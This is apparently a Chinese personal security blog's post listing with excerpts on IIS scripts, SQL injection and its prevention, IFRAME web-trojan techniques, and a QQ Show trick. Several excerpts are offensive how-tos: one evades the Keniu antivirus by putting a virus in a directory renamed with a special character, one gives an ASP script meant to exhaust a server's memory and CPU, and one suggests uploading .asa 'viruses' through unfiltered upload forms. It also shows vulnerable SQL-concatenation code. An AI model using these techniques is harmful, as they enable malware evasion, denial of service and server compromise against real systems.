非常实用的Windows 2003/XP重启IIS的批处理脚本
作者:李嘉 日期:2011-04-27 01:02
服务器网管系列实用工具 - 监测某个程序运行并阻止,以阻止迅雷为例
作者:李嘉 日期:2011-04-25 23:07
[原创] 制作病毒绕过“可牛”杀毒软件查杀
作者:李嘉 日期:2010-11-13 20:59
前阵子朋友想让我帮忙找出可牛杀毒软件的弱点,乘有一些时间尝试用delphi写了一个病毒原体,测试在可牛杀毒软件可以查杀。那么如何绕过可牛的查杀呢,我尝试使用老办法,就是路径绕过漏洞,在WindowsSystem32下新建“KeniuCrack”目录并将病毒存放在目录中,可牛很快就报警了并自动查杀了病毒原体,OK,我们来绕过,方法有很多种,包括在CMD下建立一些特殊目录,我们这里可以手工建立,我们将“keniuCrack”更名为“KeniuԴCrack”,将病毒存放在更名后的目录下,OK,可牛跳出了界面但是无法对其查杀,我们通过资源管理器进入该目录,双击“病毒原体.exe”,OK,执行了,可牛就当没看见,轻松绕过查杀。
ASP.NET中IFRAME网页挂马实战
作者:李嘉 日期:2009-05-29 10:04
现在常见的网页挂马有:IFRAME框架挂马、JS文件挂马、CSS挂马、ActiveX组件挂马、伪装挂马等方式,怎么样才可以有针对性地进行防范,避免网站和服务器等安全威胁呢?下面就讲解一下如何掌握IFRAME框架挂马的底细以及相应的防范方法。
什么是IFRAME框架挂马
网页挂马中IFRAME网页框架挂马是最典型最基本的挂马方式,网页木马中有一多半就是通过IFRAME进行隐藏,让用户在不察觉中受到攻击。
什么是IFRAME?
Iframe标记,又叫浮动帧标记,你可以用它将一个HTML文档嵌入在一个HTML中显示。它不同于Frame标记最大的特征即这个标记所引用的HTML文件不是与另外的HTML文件相互独立显示,而是可以直接嵌入在一个HTML文件中,与这个HTML文件内容相互融合,成为一个整体,另外,还可以多次在一个页面内显示同一内容,而不必重复写内容,一个形象的比喻即“画中画“电视。
但是IFRAME功能被黑客巧妙地利用,黑客在一些看似正常的网页中,使用长宽为0的隐藏框架,让用户在不知不觉中打开含有漏洞溢出内容的网页木马,这种手法就如同在画中画电视中打开了一个收费频道,但是由于收费频道的画面尺寸被恶意修改成了0,所以看电视的人并不知道自己已经打开了收费频道,虽然他并没有看到,但是事实上收费频道却的确在播放,而且会收取用户的使用费。
IFRAME框架挂马实战
下面我们来做个演示,看看IFRAME框架挂马到底是怎么做的。
玩转SQL注入 - 下拉列表Value值移花接木法 - 思路篇
作者:李嘉 日期:2009-05-16 08:06
在前几年国内黑客技术正旺的时候,url参数提交方法,以及文本框文本域提交注入语句风靡一时,但现在很多程序员开始注意URL和文本对象传递的参数,所以这方面的漏洞也就越来越少。但这并不代表系统的安全万无一失,有些程序员对下拉列表、多选框这些对象上的过滤却总是忽略,举个例子:
DataSet dsWf = new DataSet("NewsTopics");
SqlConnection connectionWf = new SqlConnection(MocolaConfiguration.ConnectionString);
string commandText = "SELECT * FROM NewsSubTopics WHERE ID IN (SELECT SubTopicID FROM TopicsSubTopics WHERE TopicID=" + ddlTopic.SelectedValue + ")";
SqlDataAdapter adapterWf = new SqlDataAdapter(commandTextWf,
自己写个病毒 - 瞬间使你的系统或服务器负载100%CPU假死
作者:李嘉 日期:2009-05-14 23:21
这边就利用一下系统的VBscript吧,其实就是asp啦,Vbscript的Space函数分配一块占用很大内存的空间,占用服务器资源,达到负载效果。
asp文件,内容如下:
<%
Memsize=100*1024*1024
Session("Tempx") = space(MemSize)
%>
效果就是可以让服务器负载,内存+CPU。
[小知识]
asp 和 asa 都可以被系统的asp.dll解析执行,所以一些asp病毒就以asa后缀名命名,一些上传文件的网页如果没有过滤对asa文件的上传,那你可以直接上传一个asa病毒在服务器上执行。
SQL 注入时保护数据库 - ASP ASP.NET C# 如何防止SQL注入
作者:李嘉 日期:2009-05-14 22:46
SQL注入式防止数据库攻击的一个有效策略,攻击者将注入一个SQL语句到另外一个语句中,这个通常会损坏你的数据库。有数据库接口的Web网站通常在SQL注入的时候容易受到攻击,因为它们是基于动态的SQL。最简单的组织SQL注入分类是分析SQL串并移动语句之前的任何“--”(两个-符号,在sql查询分析器里代表注释)的发生,同时要小心注入时候含有分号,因为分号是给sql语句分界。如果一个用户怀有恶意,那么他会使用各种方法看穿你的系统,所以,最简单的保护数据库的方法就是避免动态的sql! 这点非常重要,可以用存储过程来代替。
什么是动态的sql呢?
举个例子: (asp asp.net c# 类似)
string sql = "select * from table1 where id=" + id + " and name='" + name1 + "'"
类似这样的语句一般都会存在SQL注入漏洞!
Cool! QQ秀男女混穿技巧
作者:李嘉 日期:2008-12-15 23:52
最近网络上爆出QQ秀混穿的恶搞贴子,就是男的可以穿女装,女的可以穿男装。喜欢恶搞的朋友可以留意一下。
方法如下:
1. 打开你要买的Q秀主人的聊天窗口,点击右键选择“购买对方QQ秀”。进入QQ秀的网站后,可以看到自己和她 (他) 的QQ秀,要穿他 (她)的哪件就直接把鼠标移到QQ秀上面。这时候有个收藏的选项,点击收藏起来。
2.打开“我的收藏”,再对那件物品右键,选择“复制快捷方式”,然后粘贴到地址栏,你会看到“javascript:void PtuOn(34688,'F','286',,0,0,0,0,0,0,0,0,'','109030000')”这样的代码。经典和时尚都可以,有些物品用了会出现网络错误,说明不能用。
补充:
另外我也发现一个方法可以更方便更换异性服装,大家可以看我下面的截图, 结合上面的方法,就可以换装了:
---------------------------------------------------
-----
